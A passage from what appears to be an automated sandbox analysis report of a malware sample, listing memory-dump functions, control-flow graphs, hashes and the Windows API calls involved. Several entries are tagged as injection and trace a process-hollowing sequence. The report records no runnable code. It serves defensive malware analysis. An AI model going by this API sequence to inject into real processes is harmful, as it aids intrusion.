                                                                                                              • Instruction Fuzzy Hash: 4FA17BB1D0035A8FEB24CF68C9407EDBBB2BB48350F1085AAE919A7340DB749995CF91
                                                                                                              Function 077F5BD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1823 77f5bd0-77f5c65 1827 77f5c9e-77f5cbe 1823->1827 1828 77f5c67-77f5c71 1823->1828 1833 77f5cf7-77f5d26 1827->1833 1834 77f5cc0-77f5cca 1827->1834 1828->1827 1829 77f5c73-77f5c75 1828->1829 1831 77f5c98-77f5c9b 1829->1831 1832 77f5c77-77f5c81 1829->1832 1831->1827 1835 77f5c85-77f5c94 1832->1835 1836 77f5c83 1832->1836 1844 77f5d5f-77f5e19 CreateProcessA 1833->1844 1845 77f5d28-77f5d32 1833->1845 1834->1833 1837 77f5ccc-77f5cce 1834->1837 1835->1835 1838 77f5c96 1835->1838 1836->1835 1839 77f5cf1-77f5cf4 1837->1839 1840 77f5cd0-77f5cda 1837->1840 1838->1831 1839->1833 1842 77f5cde-77f5ced 1840->1842 1843 77f5cdc 1840->1843 1842->1842 1846 77f5cef 1842->1846 1843->1842 1856 77f5e1b-77f5e21 1844->1856 1857 77f5e22-77f5ea8 1844->1857 1845->1844 1847 77f5d34-77f5d36 1845->1847 1846->1839 1848 77f5d59-77f5d5c 1847->1848 1849 77f5d38-77f5d42 1847->1849 1848->1844 1851 77f5d46-77f5d55 1849->1851 1852 77f5d44 1849->1852 1851->1851 1853 77f5d57 1851->1853 1852->1851 1853->1848 1856->1857 1867 77f5eaa-77f5eae 1857->1867 1868 77f5eb8-77f5ebc 1857->1868 1867->1868 1869 77f5eb0 1867->1869 1870 77f5ebe-77f5ec2 1868->1870 1871 77f5ecc-77f5ed0 1868->1871 1869->1868 1870->1871 1872 77f5ec4 1870->1872 1873 77f5ed2-77f5ed6 1871->1873 1874 77f5ee0-77f5ee4 1871->1874 1872->1871 1873->1874 1877 77f5ed8 1873->1877 1875 77f5ef6-77f5efd 1874->1875 1876 77f5ee6-77f5eec 1874->1876 1878 77f5eff-77f5f0e 1875->1878 1879 77f5f14 1875->1879 1876->1875 1877->1874 1878->1879 1881 77f5f15 1879->1881 1881->1881
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077F5E06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 8c3838acbff01235301e8373c2fa241853e4e47a0cc65594df971df09fdb84e4
                                                                                                              • Instruction ID: 97b158a18c8de500339c798f5a83be286e284ef115199a17ef0f58c04f0eb8de
                                                                                                              • Opcode Fuzzy Hash: 8c3838acbff01235301e8373c2fa241853e4e47a0cc65594df971df09fdb84e4
                                                                                                              • Instruction Fuzzy Hash: B7916BB1D0035A8FEB24CF68C9407EDBBB2BB48350F1485AAE919A7240DB749995CF91
                                                                                                              Function 0112B300 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1882 112b300-112b31f 1883 112b321-112b32e call 112acc4 1882->1883 1884 112b34b-112b34f 1882->1884 1891 112b330 1883->1891 1892 112b344 1883->1892 1885 112b363-112b3a4 1884->1885 1886 112b351-112b35b 1884->1886 1893 112b3b1-112b3bf 1885->1893 1894 112b3a6-112b3ae 1885->1894 1886->1885 1937 112b336 call 112b598 1891->1937 1938 112b336 call 112b5a8 1891->1938 1892->1884 1895 112b3e3-112b3e5 1893->1895 1896 112b3c1-112b3c6 1893->1896 1894->1893 1898 112b3e8-112b3ef 1895->1898 1899 112b3d1 1896->1899 1900 112b3c8-112b3cf call 112acd0 1896->1900 1897 112b33c-112b33e 1897->1892 1901 112b480-112b540 1897->1901 1902 112b3f1-112b3f9 1898->1902 1903 112b3fc-112b403 1898->1903 1905 112b3d3-112b3e1 1899->1905 1900->1905 1932 112b542-112b545 1901->1932 1933 112b548-112b573 GetModuleHandleW 1901->1933 1902->1903 1906 112b410-112b419 call 112ace0 1903->1906 1907 112b405-112b40d 1903->1907 1905->1898 1913 112b426-112b42b 1906->1913 1914 112b41b-112b423 1906->1914 1907->1906 1915 112b449-112b44d 1913->1915 1916 112b42d-112b434 1913->1916 1914->1913 1939 112b450 call 112b888 1915->1939 1940 112b450 call 112b879 1915->1940 1916->1915 1918 112b436-112b446 call 112acf0 call 112ad00 1916->1918 1918->1915 1919 112b453-112b456 1922 112b458-112b476 1919->1922 1923 112b479-112b47f 1919->1923 1922->1923 1932->1933 1934 112b575-112b57b 1933->1934 1935 112b57c-112b590 1933->1935 1934->1935 1937->1897 1938->1897 1939->1919 1940->1919
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0112B566
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 1b6a19a572554d8b918217ac08139590e0cbf6b9d87b9f631bae3d5ea039d4e6
                                                                                                              • Instruction ID: d2ac3f91551e757ca7d76aeb71aca59a35b28bb40fbeb682e0e2e027721e0325
                                                                                                              • Opcode Fuzzy Hash: 1b6a19a572554d8b918217ac08139590e0cbf6b9d87b9f631bae3d5ea039d4e6
                                                                                                              • Instruction Fuzzy Hash: CB817970A04B158FD728DF2AD54079ABBF1FF88304F008A2ED486DBA50D734E955CB95
                                                                                                              Function 0112590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011259C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: c4a0cc0ad2e42ffa3947d1c647e0a4d48a1373d4131e1b61b7a09d7d29a3254f
                                                                                                              • Instruction ID: b39e22a30a53ff2bd69d9418f46b70c526e673777734894a775969d0db8622f6
                                                                                                              • Opcode Fuzzy Hash: c4a0cc0ad2e42ffa3947d1c647e0a4d48a1373d4131e1b61b7a09d7d29a3254f
                                                                                                              • Instruction Fuzzy Hash: 3141BE71C017298FEB28DFAAC885BDDBBF6BB49304F20816AD408AB251D7755946CF50
                                                                                                              Function 011244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011259C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: bf5412c2af0e97d9c8008cec5ebce307dc151f32b349186d2302eb3a92d80dcb
                                                                                                              • Instruction ID: 321348cef6f11de1dcee226599b5c20f7f69011002770264a27c7e19d9c6854b
                                                                                                              • Opcode Fuzzy Hash: bf5412c2af0e97d9c8008cec5ebce307dc151f32b349186d2302eb3a92d80dcb
                                                                                                              • Instruction Fuzzy Hash: 5241AF70D017298BDB28DFAAC8857DDBBF6BB49304F20816AD408AB251DB755945CF90
                                                                                                              Function 077F5941 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077F59D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 3c66a71126081020f659391a7407f7c1c075196013c1fb3470ab12e23e903598
                                                                                                              • Instruction ID: 7583166bcb5ea0e3a339a75cd37fb6237b0d6a3eae1cface0587ac42dd1babff
                                                                                                              • Opcode Fuzzy Hash: 3c66a71126081020f659391a7407f7c1c075196013c1fb3470ab12e23e903598
                                                                                                              • Instruction Fuzzy Hash: 9A2159B1D003199FDB14CFAAC945BEEBBF5FB48320F10842AE558A7240C7789950CBA5
                                                                                                              Function 077F57A8 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F582E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 3655304b05032412434d9e8b26d5d274f2e662f5dde5cddce84329ae8d854b8c
                                                                                                              • Instruction ID: a90fbd7c6680b72fd0da1f23b4a1c7003bd4afa108e8b85b4d1cbd1b337c3c03
                                                                                                              • Opcode Fuzzy Hash: 3655304b05032412434d9e8b26d5d274f2e662f5dde5cddce84329ae8d854b8c
                                                                                                              • Instruction Fuzzy Hash: 022159B1D003099FDB10DFAAC585BEEBBF4EB48224F10842AD919A7740CB789944CFA5
                                                                                                              Function 077F5948 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077F59D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: aea3d8878dba5021c8c21d25e3e9486a5052a74063fa0256aaf94c6fdb79f964
                                                                                                              • Instruction ID: 45c2fefe7f90da1670e34acb225e4d21fd7a6ea7b5c6bbaf4ffaa3112d2829b5
                                                                                                              • Opcode Fuzzy Hash: aea3d8878dba5021c8c21d25e3e9486a5052a74063fa0256aaf94c6fdb79f964
                                                                                                              • Instruction Fuzzy Hash: 1B2126B1D003599FDB14DFAAC985BEEBBF5FF48310F10842AE958A7240C7789950CBA5
                                                                                                              Function 077F5A31 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077F5AB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: bc3b344d98baf30b418424452641a58ec4cab7cdb872f64777c10a68eb990e1b
                                                                                                              • Instruction ID: fb463f2038b29e938fee94eb94914d7bfc4df63ed96b81594b278791a4657414
                                                                                                              • Opcode Fuzzy Hash: bc3b344d98baf30b418424452641a58ec4cab7cdb872f64777c10a68eb990e1b
                                                                                                              • Instruction Fuzzy Hash: EF2136B2C013599FDB10DFAAC985BEEBBF5FF48310F10842AE518A7640D7399950CBA5
                                                                                                              Function 077F57B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F582E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 43bdcbaedc5cf833ec79a396aa9e70f64395ffc9ff04bee61f4b8133c356f17a
                                                                                                              • Instruction ID: e5c55ded5b6d82571ba604112112d03cb945493940dcbf712ec3961fc09a3b5c
                                                                                                              • Opcode Fuzzy Hash: 43bdcbaedc5cf833ec79a396aa9e70f64395ffc9ff04bee61f4b8133c356f17a
                                                                                                              • Instruction Fuzzy Hash: 142135B1D003098FDB14DFAAC585BEEBBF4AF48214F14842AD919A7341CB789945CFA5
                                                                                                              Function 077F5A38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077F5AB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 5d0f3785397c061e2f6fc6eabe4558ac471e8f4ea1f6a48184c4197ba71bcd7f
                                                                                                              • Instruction ID: c2a7e6403c329fb9a93dc400da227eacd232c87b4f21477d4d4750af1d9e5c3c
                                                                                                              • Opcode Fuzzy Hash: 5d0f3785397c061e2f6fc6eabe4558ac471e8f4ea1f6a48184c4197ba71bcd7f
                                                                                                              • Instruction Fuzzy Hash: 762125B1C013599FDB10DFAAC981BEEBBF5FF48310F10842AE918A7240C7799910CBA5
                                                                                                              Function 0112D7C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0112D84F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 697b4ae1331add48a1dbfe4275669e0c108da3af0173014e52fafb38935112cd
                                                                                                              • Instruction ID: 857334776cb04afcad1b471c3bc33e6bcb38730008810065d4d88a7a92fb326f
                                                                                                              • Opcode Fuzzy Hash: 697b4ae1331add48a1dbfe4275669e0c108da3af0173014e52fafb38935112cd
                                                                                                              • Instruction Fuzzy Hash: 3E21F2B5D002589FDB10CFAAD584AEEBBF4BB08320F14805AE918A7210D378A951CF64
                                                                                                              Function 0112D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0112D84F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 8861fb907ea04042756ceda610d4614cd02bcc2d21da34d81e2071ab5cbde10c
                                                                                                              • Instruction ID: 1c69c7b16f91d4b8107c694c36b550ea4519ce4e4046c16e927ae5345f5d38ca
                                                                                                              • Opcode Fuzzy Hash: 8861fb907ea04042756ceda610d4614cd02bcc2d21da34d81e2071ab5cbde10c
                                                                                                              • Instruction Fuzzy Hash: 8521E4B5D002589FDB10CFAAD984ADEBBF5FB48310F14805AE918A3350D378A950CFA5
                                                                                                              Function 077F5880 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077F58F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 341cd4b99e2d17bfb018928390ae1170f67c10aacf3faf7a44ebda500b89c6d9
                                                                                                              • Instruction ID: 56e36904ed60e290e0778dca17c51e8416da605494ff00a73c746d5d0c4efd5b
                                                                                                              • Opcode Fuzzy Hash: 341cd4b99e2d17bfb018928390ae1170f67c10aacf3faf7a44ebda500b89c6d9
                                                                                                              • Instruction Fuzzy Hash: 56115BB68002489FDB14DFAAC844BDEBBF5EB48320F10881AE515A7650C7755550CBA4
                                                                                                              Function 077F56F8 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 78fba0ecd07763e9b710c0c6dbe8e31b05daac2baaf6f41bcbaa7a1db2e3e1e9
                                                                                                              • Instruction ID: c770b50bf37734eb279979daafc2e2b73c642a57fc1d7b0f8fead0e37f5bbf16
                                                                                                              • Opcode Fuzzy Hash: 78fba0ecd07763e9b710c0c6dbe8e31b05daac2baaf6f41bcbaa7a1db2e3e1e9
                                                                                                              • Instruction Fuzzy Hash: 54118BB1D00348CFDB20DFAAD5457EEFBF5EB88220F10841AD519A7740CB395540CBA5
                                                                                                              Function 077F5888 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077F58F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: b42dcbe869968e73dab67e5eec8d8d11ba08eaec7483111e8bd1933f901bca15
                                                                                                              • Instruction ID: 2cd0d1c37dc513eb4be67290bdceea0a56ec193a5d218a8da03c1eda74e9335d
                                                                                                              • Opcode Fuzzy Hash: b42dcbe869968e73dab67e5eec8d8d11ba08eaec7483111e8bd1933f901bca15
                                                                                                              • Instruction Fuzzy Hash: 5B115672C003489FDB24DFAAC844BEEBBF5EF48320F10881AE529A7250C7799510CFA4
                                                                                                              Function 077F5700 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 9a41d28629ce449a587f4e7805985004530a083c53110197d46c20a6125bbba3
                                                                                                              • Instruction ID: 75904a368cd019c207aa5672f16fe9ef26b2b539089e318040ce9351af9ff6fb
                                                                                                              • Opcode Fuzzy Hash: 9a41d28629ce449a587f4e7805985004530a083c53110197d46c20a6125bbba3
                                                                                                              • Instruction Fuzzy Hash: 98113AB1D00348CFDB24DFAAC5457EEFBF5AB48314F14841AD519A7740C7796540CBA5
                                                                                                              Function 077F8B2B Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077F8B8D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: a25aebb904bb75829d1884fd3a6c88bc775fb857afe0c166239de94f78d99756
                                                                                                              • Instruction ID: 0c28196318b8f50d9cc3ee302d6e4f64a7ecf87778b96a744cd53493addc3c4e
                                                                                                              • Opcode Fuzzy Hash: a25aebb904bb75829d1884fd3a6c88bc775fb857afe0c166239de94f78d99756
                                                                                                              • Instruction Fuzzy Hash: 0C1103B58003599FDB20DF9AD985BDEBBF8FB48320F10845AE518A7700C375A544CFA5
                                                                                                              Function 077F4034 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077F8B8D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 121a55fb6ce7a0599e802dcd638930e967d174e172254b6f720077853ade3c44
                                                                                                              • Instruction ID: 0b1b87ea71535b6bc0b19d6769906d1c124eb76177c776f8919aba15c894af58
                                                                                                              • Opcode Fuzzy Hash: 121a55fb6ce7a0599e802dcd638930e967d174e172254b6f720077853ade3c44
                                                                                                              • Instruction Fuzzy Hash: 3611F5B58003599FDB20DF9AC945BDEBBF8FB49310F10845AE918A7300C375A944CFA5
                                                                                                              Function 0112B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0112B566
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 637d59073b5d4a6ad7a7d9ac7d0916a37051fa74da40c334049bb002d67c0661
                                                                                                              • Instruction ID: 661229ac06661612833e05fcedd97ff08f18e9de710e1e32b3fc188bcfb1c116
                                                                                                              • Opcode Fuzzy Hash: 637d59073b5d4a6ad7a7d9ac7d0916a37051fa74da40c334049bb002d67c0661
                                                                                                              • Instruction Fuzzy Hash: BE110FB6C002598FDB24DF9AC544BDEFBF4AB88310F10845AD528A7210C379A545CFA5
                                                                                                              Function 074B2D98 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 7ca905b9564015f19d139fd17f6068b69c53944215f2bf41484b578857c7d521
                                                                                                              • Instruction ID: 0ed7d2050e56fa298400676824a11965db679dfec41ff5e247395f1f0966e774
                                                                                                              • Opcode Fuzzy Hash: 7ca905b9564015f19d139fd17f6068b69c53944215f2bf41484b578857c7d521
                                                                                                              • Instruction Fuzzy Hash: 337193B0600205ABEB249F66D854BEFB7E6EFC4350F10882AE4069B794DF759D42CB61
                                                                                                              Function 074BEE48 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 3058bd9134f12e115bbb958ebb5616628ab5b4bb0199e43b5abc97c4f9277b65
                                                                                                              • Instruction ID: d266a4554fb5e11f3e456730432478572c673cb1445a86d1938b807d93e25d74
                                                                                                              • Opcode Fuzzy Hash: 3058bd9134f12e115bbb958ebb5616628ab5b4bb0199e43b5abc97c4f9277b65
                                                                                                              • Instruction Fuzzy Hash: A731F8B4E04218DBDB18DFA6D8456EEBBF6BF89300F14842AD405AB354DB746D06CF50
                                                                                                              Function 074B8E68 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: 57232479d0ba9721e67ce76fd6ff508687c8e995458cf8c04aa48bce839043cf
                                                                                                              • Instruction ID: bb286de36e532d256f87d6c4ee2b3d3f83fe23fd9cb8c6725b047ea74de5cca7
                                                                                                              • Opcode Fuzzy Hash: 57232479d0ba9721e67ce76fd6ff508687c8e995458cf8c04aa48bce839043cf
                                                                                                              • Instruction Fuzzy Hash: 0111A2B192C244DFD33196E095152F67BAE9B5310AF148CABD446CB196C63E8C43C7F2
                                                                                                              Function 074B82C1 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
